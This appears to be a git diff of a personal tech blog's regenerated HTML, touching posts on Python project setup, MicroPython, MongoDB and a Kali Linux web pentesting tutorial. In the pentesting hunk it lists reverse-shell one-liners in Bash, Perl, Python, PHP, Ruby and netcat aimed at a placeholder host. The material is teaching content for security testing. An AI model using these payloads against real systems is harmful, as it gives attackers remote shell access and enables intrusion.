    It's now time to create a project from scratch, so navigate to where you like to keep your projects (mine are mostly in Documents\Github\), but you can put them anywhere you like. Now run command prompt again (or keep the one you have open) and navigate to the dedicated folder (or folders) using cd.

    With most of my projects lately being data science in nature, I like to use the cookiecutter-data-science template, which you can find all the information about here: https://drivendata.github.io/cookiecutter-data-science/. To create a project, it is as simple as running:

    -
    1
    cookiecutter https://github.com/drivendata/cookiecutter-data-science
    +
    1
    cookiecutter https://github.com/drivendata/cookiecutter-data-science
     

    image-3.png

    Provide as much information as you wish into the questions and you will now have a folder created wherever you ran the command with all the relevant sections from the template.

    Whenever starting a new Python project, my personal preference is to keep the virtual environment within the project directory, however this is not always normal practice. To create a virtual environment for our Python packages, navigate into the project and run (if you added Scripts to your Path):

    -
    1
    virtualenv env
    +
    1
    virtualenv env
     

    This will then initialise a folder ('env') within your current directory and install a copy of Python and all its relevant tools there.

    Before we go any further, this is the point that I like to initialise a git repository. To do this, run git init from your command line from within the project directory.

    Now to finish off the final steps of the workflow that affect day-to-day development: I like to use pre-commit hooks to reformat my code with black and, on some projects, check for PEP 8 conformance with flake8 on every commit to the project's repository. This is purely a personal preference on how you would like to work; others like to use pytest and more to ensure their projects are working as intended, however I am not at that stage just yet.

    To install these pre-commit hooks into our workflow, firstly activate the virtual environment from within our project by running env/Scripts/activate.bat. This will activate your project's Python package management system and runtime, after which you can install packages from pip and elsewhere. For our pre-commits we install the package 'pre-commit':

    -
    1
    pip install pre-commit
    +
    1
    pip install pre-commit
     

    Following this, to set up the commit hooks, create a '.pre-commit-config.yaml' within your main project directory. This is where we specify which hooks we would like to run before being able to commit. Below is a sample .pre-commit-config.yaml that I use in my projects:
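
    A file of that shape looks roughly like this minimal sketch (the repository revisions are assumptions; pin the versions you actually use):

    ```yaml
    # minimal .pre-commit-config.yaml sketch: black formatting + flake8 linting
    repos:
      - repo: https://github.com/psf/black
        rev: 22.3.0        # illustrative revision; pin your own
        hooks:
          - id: black
      - repo: https://github.com/pycqa/flake8
        rev: 4.0.1         # illustrative revision; pin your own
        hooks:
          - id: flake8
    ```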

    -
     1
    +
     1
      2
      3
      4
    @@ -226,7 +226,7 @@ 

    Python Project Workflow

    On the default cookiecutter data science template, with the settings as above, this will show on the pre-commit run (after you have staged changes in git; use git add -A for all):

    image-4.png

    We can already see differing opinions on code formatting in flake8's output: the black code formatter's line length is 88 characters, not 79 like PEP 8. So we will add a pyproject.toml to the project directory, where we can specify settings for the black tool:
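
    One possible minimal pyproject.toml for this (a sketch; 88 is black's default, stated explicitly so the project's tooling agrees on one number):

    ```toml
    [tool.black]
    line-length = 88
    ```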

    -
     1
    +
     1
      2
      3
      4
    @@ -262,7 +262,7 @@ 

    Python Project Workflow

    For any flake8 specific settings (such as error codes to ignore), we can set a .flake8 file in the project directory as well, which may look like:
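
    One possible .flake8 that aligns flake8 with black's 88-character lines (E203 is commonly ignored because black's slice formatting triggers it):

    ```ini
    [flake8]
    max-line-length = 88
    extend-ignore = E203
    ```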

    -
    1
    +
    1
     2
     3
     4
    diff --git a/sitemap.xml b/sitemap.xml
    index 561c8c9e..e63155ca 100644
    --- a/sitemap.xml
    +++ b/sitemap.xml
    @@ -5,28 +5,28 @@ xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
     
     
     https://jackmckew.dev/
    -2024-08-08T04:20:47-00:00
    +2024-08-08T04:21:55-00:00
     daily
     0.6
     
     
     
     https://jackmckew.dev/archives.html
    -2024-08-08T04:20:47-00:00
    +2024-08-08T04:21:55-00:00
     daily
     0.6
     
     
     
     https://jackmckew.dev/tags.html
    -2024-08-08T04:20:47-00:00
    +2024-08-08T04:21:55-00:00
     daily
     0.6
     
     
     
     https://jackmckew.dev/categories.html
    -2024-08-08T04:20:47-00:00
    +2024-08-08T04:21:55-00:00
     daily
     0.6
     
    diff --git a/tag/python4.html b/tag/python4.html
    index 4f66b9fd..b96857d9 100644
    --- a/tag/python4.html
    +++ b/tag/python4.html
    @@ -153,7 +153,7 @@ 

    Document code automatically through docstrings with Sphinx

    This post goes into how to generate documentation for your python projects automatically with Sphinx!

    First off, we have to install sphinx into our virtual environment. Depending on your flavour, we can do any of the following

    -
    1
    +
    1
     2
     3
    pip install sphinx …

    diff --git a/web-penetration-testing-with-kali-linux.html b/web-penetration-testing-with-kali-linux.html index 7922dad7..986755da 100644 --- a/web-penetration-testing-with-kali-linux.html +++ b/web-penetration-testing-with-kali-linux.html @@ -273,27 +273,27 @@

    Exploiting Code Execution Vul

    Following this is a list of commands you could execute to get a reverse connection in different supported languages, where the variable to change is denoted by [HOST_IP], and optionally the port. Note that these are all 'one-liners', so they can be executed in input boxes.

    Bash

    -
    1
    bash -i >& /dev/tcp/[HOST_IP]/8080 0>&1
    +
    1
    bash -i >& /dev/tcp/[HOST_IP]/8080 0>&1
     

    PERL

    -
    1
    perl -e 'use Socket;$i="[HOST_IP]";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
    +
    1
    perl -e 'use Socket;$i="[HOST_IP]";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
     

    Python

    -
    1
    python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("[HOST_IP]",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
    +
    1
    python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("[HOST_IP]",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
     

    PHP

    -
    1
    php -r '$sock=fsockopen("[HOST_IP]",8080);exec("/bin/sh -i <&3 >&3 2>&3");'
    +
    1
    php -r '$sock=fsockopen("[HOST_IP]",8080);exec("/bin/sh -i <&3 >&3 2>&3");'
     

    Ruby

    -
    1
    ruby -rsocket -e'f=TCPSocket.open("[HOST_IP]",8080).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
    +
    1
    ruby -rsocket -e'f=TCPSocket.open("[HOST_IP]",8080).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
     

    Netcat

    -
    1
    nc -e /bin/sh [HOST_IP] 8080
    +
    1
    nc -e /bin/sh [HOST_IP] 8080
     

    Local File Inclusion

    @@ -303,7 +303,7 @@

    Remote File Inclusion

    1. Create a PHP file with the following:
    -
    1
    +
    1
     2
     3
     4
    diff --git a/what-is-micropython.html b/what-is-micropython.html
    index 24aff571..440121fe 100644
    --- a/what-is-micropython.html
    +++ b/what-is-micropython.html
    @@ -164,7 +164,7 @@ 

    What is MicroPython?

    Differences between MicroPython & Python

    There obviously had to be some changes between Python and MicroPython to make it work efficiently on processors with a fraction of the power, but what are they? If you are a beginner-to-intermediate Python programmer, you'll only run into trouble in very specific scenarios, which can be easily worked around. For example, you cannot delete from a list with a step greater than 1.

    Sample Python Code

    -
    1
    +
    1
     2
     3
    L = [1,2,3,4]
     del(L[0:4:2])
    @@ -188,7 +188,7 @@ 

    Sample Python Code

    However, this can easily be worked around with an explicit loop, for example:

    Sample MicroPython/Python Code

    -
    1
    +
    1
     2
     3
     4
    L = [1,2,3,4]
    diff --git a/what-is-mongodb.html b/what-is-mongodb.html
    index bb3169b0..3ebcf1c4 100644
    --- a/what-is-mongodb.html
    +++ b/what-is-mongodb.html
    @@ -170,14 +170,14 @@ 

    What is MongoDB?

    MongoDB is an open source document-oriented database program, classified as a NoSQL database, which utilizes JSON-like documents with optional schemas. They also provide a tool called 'Compass' to help sift through the database.

    Personally, I really enjoy the functionality within Compass for plotting geographical data, presenting data type variances across the fields in a document, and many other features. I found Compass one of the most appealing features, as someone who constantly seeks to gain insight from data.

    Queries within MongoDB are structured like a dictionary in Python, where the field in the document is passed as the key and the criteria as the value. For example, a basic query to return all documents within a MongoDB database with score equal to 7 would be:

    -
    1
    {score:7}
    +
    1
    {score:7}
     

    As a mainly Python developer, I found this very appealing, as I find myself using dictionaries constantly when writing Python code; MongoDB using this format makes for an easy connection between the two.

    CRUD operations are the fundamentals of actually using a database. Through the Mongo shell you are able to add documents to the MongoDB database in JSON, XML, and other data formats.

    Projections within MongoDB are used to specify or restrict the fields returned with the filtered documents, if you are specifically looking at a few fields within a densely populated document.

    In addition to the way queries are structured for filtering documents, it is also possible to use one of the many query or projection operators to further filter the documents. For example, a query to return all documents with a score greater than or equal to 7 would be:
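
    In plain Python terms, the $gte operator keeps documents whose field is greater than or equal to the given value, which can be sketched like so (the documents are illustrative):

    ```python
    # plain-Python equivalent of the {score: {$gte: 7}} filter
    docs = [{"name": "a", "score": 5},
            {"name": "b", "score": 7},
            {"name": "c", "score": 9}]
    matches = [d for d in docs if d["score"] >= 7]
    print([d["name"] for d in matches])  # ['b', 'c']
    ```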

    -
    1
    {score: {$gte: 7}}
    +
    1
    {score: {$gte: 7}}
     

    This sums up all of the takeaways I found from the M001 course for MongoDB. I look forward to taking more of the courses on MongoDB University to gain a greater understanding and to utilise MongoDB across some of my projects.